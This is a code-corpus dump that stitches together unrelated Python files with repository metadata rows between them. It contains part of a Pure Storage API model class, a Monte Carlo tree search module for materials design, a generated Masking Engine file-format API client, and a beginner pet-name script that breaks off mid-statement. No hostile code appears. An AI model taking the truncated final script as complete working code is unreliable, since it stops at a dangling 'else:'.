continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the `continuation_token` to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The `continuation_token` is generated if the `limit` is less than the remaining number of items, and the default sort is used (no sort is specified).
total_item_count (int): Total number of items after applying `filter` params.
items (list[NetworkInterfaceTrace]): A list of network trace run result.
"""
if continuation_token is not None:
self.continuation_token = continuation_token
if total_item_count is not None:
self.total_item_count = total_item_count
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `NetworkInterfaceTraceGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
return None
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(NetworkInterfaceTraceGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NetworkInterfaceTraceGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"tlewis@purestorage.com"
] |
tlewis@purestorage.com
|
74e35392f5c4e36cd4980a15661af109baa74410
|
516b2b403bf9033fe4fedbab014b09710b21efd8
|
/mdts/mdts.py
|
276c7c6a84fff8ebb04f5ac5bc9d6d9c772bbdba
|
[] |
no_license
|
usccolumbia/MDTS
|
77f4960a975b1b4f0ff2425e1dee5c23deafaba5
|
56c97a56eb3a9d48541998b60af43f385377fdbe
|
refs/heads/master
| 2020-03-31T11:36:55.420586
| 2018-02-21T08:12:15
| 2018-02-21T08:12:15
| 152,183,835
| 1
| 0
| null | 2018-10-09T03:44:07
| 2018-10-09T03:44:07
| null |
UTF-8
|
Python
| false
| false
| 14,498
|
py
|
from __future__ import division
from node import Node
from result import Result
import collections
import random
import numpy as np
import sys
import combo
import math
import ast
class Tree:
def __init__(self, get_reward, positions_order="reverse", max_flag=True, expand_children=1,
space=None, candidate_pool_size=None, no_positions=None, atom_types=None, atom_const=None, play_out=1, play_out_selection="best",
ucb="mean", use_combo=False, combo_init_random=1, combo_step=1, combo_lvl=1, combo_play_out=10):
if space is None:
self.space=None
if (no_positions is None) or (atom_types is None):
sys.exit("no_positions and atom_types should not be None")
else:
self.no_positions = no_positions
self.atom_types = atom_types
self.atom_const = atom_const
if (use_combo) and (candidate_pool_size is None):
sys.exit("Please set the space or set candidate_pool_size for combo search")
else:
self.candidate_pool_size = candidate_pool_size
else:
self.space = space.copy()
self.no_positions = space.shape[1]
self.atom_types = np.unique(space)
if positions_order == "direct":
self.positions_order = range(self.no_positions)
elif positions_order == "reverse":
self.positions_order = range(self.no_positions)[::-1]
elif positions_order == "shuffle":
self.positions_order = random.sample(range(self.no_positions), self.no_positions)
elif isinstance(positions_order, list):
self.positions_order = positions_order
else:
sys.exit("Please specify positions order")
self.chkd_candidates = collections.OrderedDict()
self.max_flag = max_flag
self.root = Node(value='R', children_values=self.atom_types, struct=[None]*self.no_positions)
self.acc_threshold = 0.1
self.get_reward = get_reward
if expand_children == "all":
self.expand_children = len(self.atom_types)
elif isinstance(expand_children, int):
if (expand_children > len(self.atom_types)) or (expand_children == 0):
sys.exit("Please choose appropriate number of children to expand")
else:
self.expand_children = expand_children
self.result = Result()
self.play_out = play_out
if play_out_selection == "best":
self.play_out_selection_mean = False
elif play_out_selection =="mean":
self.play_out_selection_mean = True
else:
sys.exit("Please set play_out_selection to either mean or best")
self.use_combo = use_combo
self.combo_init_random = combo_init_random
self.combo_step = combo_step
self.combo_lvl = combo_lvl
self.combo_play_out=combo_play_out
# if use_combo is True and space is None:
# sys.exit("Please set space to be able to use combo")
if ucb == "best":
self.ucb_mean = False
elif ucb =="mean":
self.ucb_mean = True
else:
sys.exit("Please set ucb to either mean or best")
def _enumerate_cand(self, struct, size):
structure = struct[:]
chosen_candidates = []
if self.atom_const is not None:
for value_id in range(len(self.atom_types)):
if structure.count(self.atom_types[value_id]) > self.atom_const[value_id]:
return chosen_candidates
for pout in range(size):
cand = structure[:]
for value_id in range(len(self.atom_types)):
diff = self.atom_const[value_id] - cand.count(self.atom_types[value_id])
if diff != 0:
avl_pos = [i for i, x in enumerate(cand) if x is None]
to_fill_pos = np.random.choice(avl_pos, diff, replace=False)
for pos in to_fill_pos:
cand[pos] = self.atom_types[value_id]
chosen_candidates.append(cand)
else:
for pout in range(size):
cand = structure[:]
avl_pos = [i for i, x in enumerate(cand) if x is None]
for pos in avl_pos:
cand[pos] = np.random.choice(self.atom_types)
chosen_candidates.append(cand)
return chosen_candidates
    def _simulate(self, struct, lvl):
        # Play-out dispatcher for a partially filled structure ``struct``:
        # - no explicit search space: enumerate random completions, and if
        #   COMBO is enabled, Bayesian-optimise over a random candidate pool;
        # - explicit space matrix: hand off to COMBO once the tree depth
        #   ``lvl`` reaches combo_lvl, otherwise sample matching rows.
        if self.space is None:
            if self.use_combo is False:
                return self._enumerate_cand(struct,self.play_out)
            else:
                my_space=self._enumerate_cand(struct,self.candidate_pool_size)
                return self._simulate_combo(struct, np.array(my_space))
        else:
            if (self.use_combo) and (lvl >= self.combo_lvl):
                return self._simulate_combo(struct)
            else:
                return self._simulate_matrix(struct)
    def _simulate_matrix(self, struct):
        # Complete ``struct`` by sampling rows of self.space whose values
        # agree with struct at every already-filled position.  Returns up
        # to self.play_out candidates as lists (empty list if no row matches).
        structure = struct[:]
        chosen_candidates = []
        filled_pos = [i for i, x in enumerate(structure) if x is not None]
        filled_values = [x for i, x in enumerate(structure) if x is not None]
        sub_data = self.space[:, filled_pos]
        avl_candidates_idx = np.where(np.all(sub_data == filled_values, axis=1))[0]
        if len(avl_candidates_idx) != 0:
            # np.random.choice samples WITH replacement here, so duplicate
            # candidates are possible even when enough matches exist.
            if self.play_out <= len(avl_candidates_idx):
                chosen_idxs = np.random.choice(avl_candidates_idx, self.play_out)
            else:
                chosen_idxs = np.random.choice(avl_candidates_idx, len(avl_candidates_idx))
            for idx in chosen_idxs:
                chosen_candidates.append(list(self.space[idx]))
        return chosen_candidates
    def _simulate_combo(self, struct, my_space=None):
        """Play out *struct* with COMBO Bayesian optimisation.

        The candidate pool is either *my_space* (already enumerated by the
        caller) or the rows of ``self.space`` consistent with the fixed
        positions of *struct*.  Previously evaluated candidates seed the
        optimiser, a short random search tops up the initial data if
        needed, and the remaining budget (``self.combo_play_out``) is spent
        on Thompson-sampling Bayesian search.  Rewards are negated
        internally when minimising, because COMBO always maximises.
        Returns the list of structures the optimiser evaluated.

        NOTE(review): ``zip(...)`` followed by ``.sort()`` below only works
        on Python 2, where ``zip`` returns a list — this module predates
        Python 3.
        """
        chosen_candidates = []
        if my_space is None:
            # Restrict self.space to rows that agree with the already
            # fixed (non-None) positions of the partial structure.
            structure = struct[:]
            filled_pos = [i for i, x in enumerate(structure) if x is not None]
            filled_values = [x for i, x in enumerate(structure) if x is not None]
            sub_data = self.space[:, filled_pos]
            avl_candidates_idx = np.where(np.all(sub_data == filled_values, axis=1))[0]
            sub_space=self.space[avl_candidates_idx]
        else:
            sub_space=my_space
        if sub_space.shape[0] !=0:
            def combo_simulater(action):
                # COMBO maximises, so cached/fresh rewards are negated when
                # self.max_flag is False.  self.chkd_candidates caches by
                # the str() of the candidate list to avoid re-evaluation.
                if str(list(sub_space[action[0]])) in self.chkd_candidates.keys():
                    if self.max_flag:
                        return self.chkd_candidates[str(list(sub_space[action[0]]))]
                    else:
                        return -self.chkd_candidates[str(list(sub_space[action[0]]))]
                else:
                    if self.max_flag:
                        return self.get_reward(sub_space[action[0]])
                    else:
                        return -self.get_reward(sub_space[action[0]])
            policy = combo.search.discrete.policy(test_X=sub_space)
            if self.combo_play_out <= 1:
                sys.exit("combo_play_out can not be less than 2 when use_combo is True")
            # Seed the policy with already-evaluated candidates that also
            # appear in the current sub-space, best first.
            sub_space_scand_cand=[]
            sub_space_scand_val=[]
            for c in self.chkd_candidates.keys():
                t=np.where(np.all(sub_space == ast.literal_eval(c), axis=1))[0]
                if len(t) !=0:
                    sub_space_scand_cand.append(t[0])
                    if self.max_flag:
                        sub_space_scand_val.append(self.chkd_candidates[c])
                    else:
                        sub_space_scand_val.append(-self.chkd_candidates[c])
            sub_space_pair=zip(sub_space_scand_cand,sub_space_scand_val)
            sub_space_pair.sort(key=lambda x: x[1],reverse=True)
            # 'trained' counts observations already given to the policy, so
            # the Bayesian phase only spends the remaining budget.
            if len(sub_space_pair) >= self.combo_play_out:
                for i in range(self.combo_play_out):
                    policy.write(sub_space_pair[i][0],sub_space_pair[i][1])
                trained=self.combo_play_out
            else:
                for x in sub_space_pair:
                    policy.write(x[0],x[1])
                trained=len(sub_space_pair)
                if len(sub_space_pair) < self.combo_init_random:
                    # Not enough seed data: top up with random probes, but
                    # never more than the sub-space can provide.
                    if sub_space.shape[0] >= self.combo_init_random:
                        policy.random_search(max_num_probes=self.combo_init_random-len(sub_space_pair),
                                             simulator=combo_simulater)
                        trained=self.combo_init_random
                    else:
                        policy.random_search(max_num_probes=sub_space.shape[0] - len(sub_space_pair),
                                             simulator=combo_simulater)
                        trained=sub_space.shape[0]
            if sub_space.shape[0] >= self.combo_play_out:
                res = policy.bayes_search(max_num_probes=self.combo_play_out-trained, simulator=combo_simulater
                                          , score='TS', interval=self.combo_step, num_rand_basis=5000)
            else:
                res = policy.bayes_search(max_num_probes=sub_space.shape[0] - trained, simulator=combo_simulater
                                          , score='TS', interval=self.combo_step, num_rand_basis=5000)
            # Record every action COMBO evaluated (undoing the sign flip)
            # and return the corresponding structures.
            for i in range(len(res.chosed_actions[0:res.total_num_search])):
                action=res.chosed_actions[i]
                if self.max_flag:
                    e=res.fx[i]
                else:
                    e=-res.fx[i]
                if str(list(sub_space[action])) not in self.chkd_candidates.keys():
                    self.chkd_candidates[str(list(sub_space[action]))] = e
                #action_origin_idx = np.where(np.all(self.space== sub_space[action], axis=1))[0]
                #self.space = np.delete(self.space,action_origin_idx[0],axis=0)
                chosen_candidates.append(list(sub_space[action]))
        return chosen_candidates
    def search(self, no_candidates=None, display=True):
        """Run Monte Carlo tree search until *no_candidates* structures
        have been evaluated.

        Each round selects a node by UCB, either evaluates its complete
        structure or expands children and backs up play-out rewards, and
        shrinks the exploration constant when a round makes no progress.
        Returns ``self.result`` populated with the search summary.

        NOTE(review): this method uses Python 2 ``print`` statements and
        ``dict.itervalues()`` — it will not run under Python 3.
        """
        prev_len = 0
        prev_current = None
        round_no = 1
        if no_candidates is None :
            sys.exit("Please specify no_candidates")
        else:
            while len(self.chkd_candidates) < no_candidates:
                current = self.root.select(self.max_flag, self.ucb_mean)
                if current.level == self.no_positions:
                    # Leaf at full depth: the structure is complete, so
                    # evaluate it directly (using the cache if possible).
                    struct = current.struct[:]
                    if str(struct) not in self.chkd_candidates.keys():
                        e = self.get_reward(struct)
                        self.chkd_candidates[str(struct)] = e
                    else:
                        e = self.chkd_candidates[str(struct)]
                    current.bck_prop(e)
                else:
                    # Interior node: expand children and run play-outs.
                    position = self.positions_order[current.level]
                    try_children = current.expand(position, self.expand_children)
                    for try_child in try_children:
                        all_struct = self._simulate(try_child.struct,try_child.level)
                        #if len(all_struct) != 0:
                        rewards = []
                        for struct in all_struct:
                            if str(struct) not in self.chkd_candidates.keys():
                                e = self.get_reward(struct)
                                if e is not False:
                                    self.chkd_candidates[str(struct)] = e
                            else:
                                e = self.chkd_candidates[str(struct)]
                            rewards.append(e)
                        # get_reward may signal failure with False; drop those.
                        rewards[:] = [x for x in rewards if x is not False]
                        if len(rewards)!=0:
                            if self.play_out_selection_mean:
                                best_e = np.mean(rewards)
                            else:
                                if self.max_flag:
                                    best_e = max(rewards)
                                else:
                                    best_e = min(rewards)
                            try_child.bck_prop(best_e)
                        else:
                            # Child play-out produced nothing usable: prune
                            # the child and back up a play-out from the
                            # current node instead.
                            current.children[try_child.value] = None
                            all_struct = self._simulate(current.struct,current.level)
                            rewards = []
                            for struct in all_struct:
                                if str(struct) not in self.chkd_candidates.keys():
                                    e = self.get_reward(struct)
                                    self.chkd_candidates[str(struct)] = e
                                else:
                                    e = self.chkd_candidates[str(struct)]
                                rewards.append(e)
                            if self.play_out_selection_mean:
                                best_e = np.mean(rewards)
                            else:
                                if self.max_flag:
                                    best_e = max(rewards)
                                else:
                                    best_e = min(rewards)
                            current.bck_prop(best_e)
                if (current == prev_current) and (len(self.chkd_candidates) == prev_len):
                    # Stalled on the same node with no new candidates:
                    # damp the node's exploration constant.
                    # NOTE(review): on Python 2 with integer operands this
                    # is floor division and yields 0 whenever any progress
                    # has been made — likely intended as float division;
                    # confirm against the original MDTS sources.
                    adjust_val = (no_candidates-len(self.chkd_candidates))/no_candidates
                    if adjust_val < self.acc_threshold:
                        adjust_val = self.acc_threshold
                    current.adjust_c(adjust_val)
                prev_len = len(self.chkd_candidates)
                prev_current = current
                if display:
                    print "round ", round_no
                    print "checked candidates = ", len(self.chkd_candidates)
                    if self.max_flag:
                        print "current best = ", max(self.chkd_candidates.itervalues())
                    else:
                        print "current best = ", min(self.chkd_candidates.itervalues())
                round_no += 1
        self.result.format(no_candidates=no_candidates, chkd_candidates=self.chkd_candidates, max_flag=self.max_flag)
        self.result.no_nodes, visits, self.result.max_depth_reached = self.root.get_info()
        self.result.avg_node_visit = visits / self.result.no_nodes
        return self.result
|
[
"thaer.dieb@gmail.com"
] |
thaer.dieb@gmail.com
|
e057ef624b94fe0256123ec91bdf0734eb2d87bd
|
a79bc871a72d2c39bcbb7cb4242a7d469770bed0
|
/masking_api_60/api/file_format_api.py
|
750b5fa51da54a2f71b8f4f29ba1d59f7edf3fc1
|
[] |
no_license
|
pioro/masking_api_60
|
5e457249ab8a87a4cd189f68821167fa27c084f2
|
68473bdf0c05cbe105bc7d2e2a24e75a9cbeca08
|
refs/heads/master
| 2023-01-03T08:57:49.943969
| 2020-10-30T11:42:15
| 2020-10-30T11:42:15
| 279,624,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,223
|
py
|
# coding: utf-8
"""
Masking API
Schema for the Masking Engine API # noqa: E501
OpenAPI spec version: 5.1.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from masking_api_60.api_client import ApiClient
class FileFormatApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """
    # Client bindings for the Masking Engine /file-formats endpoints.
    # Each public method delegates to a *_with_http_info twin that does the
    # kwargs validation and the actual HTTP call via ApiClient.
    def __init__(self, api_client=None):
        # Fall back to a default-configured ApiClient when none is injected.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client
    def create_file_format(self, file_format, file_format_type, **kwargs):  # noqa: E501
        """Create file format  # noqa: E501
        WARNING: The generated curl command is incorrect, so please refer to the Masking API guide for instructions on how to upload files through the API  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_file_format(file_format, file_format_type, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param file file_format: The file format to be uploaded. The logical name of the file format will be exactly the name of this uploaded file (required)
        :param str file_format_type: The type of the file format being uploaded (required)
        :return: FileFormat
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.create_file_format_with_http_info(file_format, file_format_type, **kwargs)  # noqa: E501
        else:
            (data) = self.create_file_format_with_http_info(file_format, file_format_type, **kwargs)  # noqa: E501
            return data
    def create_file_format_with_http_info(self, file_format, file_format_type, **kwargs):  # noqa: E501
        """Create file format  # noqa: E501
        WARNING: The generated curl command is incorrect, so please refer to the Masking API guide for instructions on how to upload files through the API  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_file_format_with_http_info(file_format, file_format_type, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param file file_format: The file format to be uploaded. The logical name of the file format will be exactly the name of this uploaded file (required)
        :param str file_format_type: The type of the file format being uploaded (required)
        :return: FileFormat
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['file_format', 'file_format_type']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Reject any keyword argument that is not a known parameter.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_file_format" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'file_format' is set
        if ('file_format' not in params or
                params['file_format'] is None):
            raise ValueError("Missing the required parameter `file_format` when calling `create_file_format`")  # noqa: E501
        # verify the required parameter 'file_format_type' is set
        if ('file_format_type' not in params or
                params['file_format_type'] is None):
            raise ValueError("Missing the required parameter `file_format_type` when calling `create_file_format`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # The format file is sent as a multipart upload; its type travels
        # alongside it as an ordinary form field.
        if 'file_format' in params:
            local_var_files['fileFormat'] = params['file_format']  # noqa: E501
        if 'file_format_type' in params:
            form_params.append(('fileFormatType', params['file_format_type']))  # noqa: E501
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['multipart/form-data'])  # noqa: E501
        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501
        return self.api_client.call_api(
            '/file-formats', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='FileFormat',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def delete_file_format(self, file_format_id, **kwargs):  # noqa: E501
        """Delete file format by ID  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_file_format(file_format_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int file_format_id: The ID of the file format to delete (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_file_format_with_http_info(file_format_id, **kwargs)  # noqa: E501
        else:
            (data) = self.delete_file_format_with_http_info(file_format_id, **kwargs)  # noqa: E501
            return data
    def delete_file_format_with_http_info(self, file_format_id, **kwargs):  # noqa: E501
        """Delete file format by ID  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_file_format_with_http_info(file_format_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int file_format_id: The ID of the file format to delete (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['file_format_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Reject any keyword argument that is not a known parameter.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_file_format" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'file_format_id' is set
        if ('file_format_id' not in params or
                params['file_format_id'] is None):
            raise ValueError("Missing the required parameter `file_format_id` when calling `delete_file_format`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'file_format_id' in params:
            path_params['fileFormatId'] = params['file_format_id']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501
        return self.api_client.call_api(
            '/file-formats/{fileFormatId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def get_all_file_formats(self, **kwargs):  # noqa: E501
        """Get all file formats  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_file_formats(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int page_number: The page number for which to get file formats. This will default to the first page if excluded
        :param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
        :return: FileFormatList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_all_file_formats_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_all_file_formats_with_http_info(**kwargs)  # noqa: E501
            return data
    def get_all_file_formats_with_http_info(self, **kwargs):  # noqa: E501
        """Get all file formats  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_all_file_formats_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int page_number: The page number for which to get file formats. This will default to the first page if excluded
        :param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
        :return: FileFormatList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['page_number', 'page_size']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Reject any keyword argument that is not a known parameter.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_all_file_formats" % key
                )
            params[key] = val
        del params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        # Pagination is optional; omitted values fall back to server defaults.
        if 'page_number' in params:
            query_params.append(('page_number', params['page_number']))  # noqa: E501
        if 'page_size' in params:
            query_params.append(('page_size', params['page_size']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501
        return self.api_client.call_api(
            '/file-formats', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='FileFormatList',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def get_file_format_by_id(self, file_format_id, **kwargs):  # noqa: E501
        """Get file format by ID  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_file_format_by_id(file_format_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int file_format_id: The ID of the file format to get (required)
        :return: FileFormat
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_file_format_by_id_with_http_info(file_format_id, **kwargs)  # noqa: E501
        else:
            (data) = self.get_file_format_by_id_with_http_info(file_format_id, **kwargs)  # noqa: E501
            return data
    def get_file_format_by_id_with_http_info(self, file_format_id, **kwargs):  # noqa: E501
        """Get file format by ID  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_file_format_by_id_with_http_info(file_format_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int file_format_id: The ID of the file format to get (required)
        :return: FileFormat
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['file_format_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Reject any keyword argument that is not a known parameter.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_file_format_by_id" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'file_format_id' is set
        if ('file_format_id' not in params or
                params['file_format_id'] is None):
            raise ValueError("Missing the required parameter `file_format_id` when calling `get_file_format_by_id`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'file_format_id' in params:
            path_params['fileFormatId'] = params['file_format_id']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501
        return self.api_client.call_api(
            '/file-formats/{fileFormatId}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='FileFormat',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def update_file_format(self, file_format_id, body, **kwargs):  # noqa: E501
        """Update file format  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_file_format(file_format_id, body, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int file_format_id: The ID of the file format to update (required)
        :param FileFormat body: The updated file format (required)
        :return: FileFormat
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.update_file_format_with_http_info(file_format_id, body, **kwargs)  # noqa: E501
        else:
            (data) = self.update_file_format_with_http_info(file_format_id, body, **kwargs)  # noqa: E501
            return data
    def update_file_format_with_http_info(self, file_format_id, body, **kwargs):  # noqa: E501
        """Update file format  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_file_format_with_http_info(file_format_id, body, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int file_format_id: The ID of the file format to update (required)
        :param FileFormat body: The updated file format (required)
        :return: FileFormat
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['file_format_id', 'body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # Reject any keyword argument that is not a known parameter.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_file_format" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'file_format_id' is set
        if ('file_format_id' not in params or
                params['file_format_id'] is None):
            raise ValueError("Missing the required parameter `file_format_id` when calling `update_file_format`")  # noqa: E501
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `update_file_format`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'file_format_id' in params:
            path_params['fileFormatId'] = params['file_format_id']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['api_key']  # noqa: E501
        return self.api_client.call_api(
            '/file-formats/{fileFormatId}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='FileFormat',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
|
[
"marcin@delphix.com"
] |
marcin@delphix.com
|
6b7bcedc92889fdfac3fae2f3865e4e431ac3a06
|
c381e484986b08022be508f285cc142017680319
|
/mycats.py
|
6c7f2ff8b22648624d73da15fc6a121f54af7a82
|
[] |
no_license
|
kasalak/automate-the-boring-stuff
|
1060d4919f23b25c6653fd55ef09c436bb7ea2bd
|
e205bac5cd629f52af11e5ace6475e764612498e
|
refs/heads/master
| 2021-01-21T13:53:14.332726
| 2016-05-10T17:24:04
| 2016-05-10T17:24:04
| 51,721,180
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 194
|
py
|
# Ask for a pet name and report whether it is in the known-pets list.
mypets = ['Zophie', 'Pooka', 'Fat-tail']
print('Enter a pet name: ')
name = input()
if name not in mypets:
    print('I do not have a pet named ' + name)
else:
